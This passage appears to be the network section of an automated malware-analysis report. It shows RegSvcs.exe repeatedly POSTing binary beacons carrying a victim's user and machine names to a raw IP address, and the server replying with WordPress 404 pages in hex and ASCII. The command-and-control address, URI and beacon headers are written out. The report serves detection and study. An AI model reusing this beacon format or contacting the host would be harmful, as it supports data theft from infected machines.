                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:41.307600975 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:43:41.307637930 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:43:41.307672977 CEST672INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:43:41.307710886 CEST1236INData Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d
                                            Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
                                            May 29, 2024 15:43:41.307743073 CEST224INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a
                                            Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
                                            May 29, 2024 15:43:41.307776928 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:43:41.307811022 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:43:41.307848930 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:43:41.307955027 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            35192.168.2.94975045.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:41.466952085 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:41.471887112 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:43.948173046 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:42 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:43.948203087 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:43:43.948213100 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:43:43.948225021 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:43:43.948236942 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:43:43.948317051 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:43:43.948348999 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:43:43.948358059 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:43:43.948431015 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:43:43.948457003 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            36192.168.2.94975145.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:44.149214029 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:44.158622026 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:46.674073935 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:44 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:46.674097061 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:43:46.674108982 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:43:46.674119949 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:43:46.674130917 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:43:46.674247980 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:43:46.674266100 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:43:46.674277067 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:43:46.674468040 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:43:46.674480915 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            37192.168.2.94975245.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:46.833672047 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
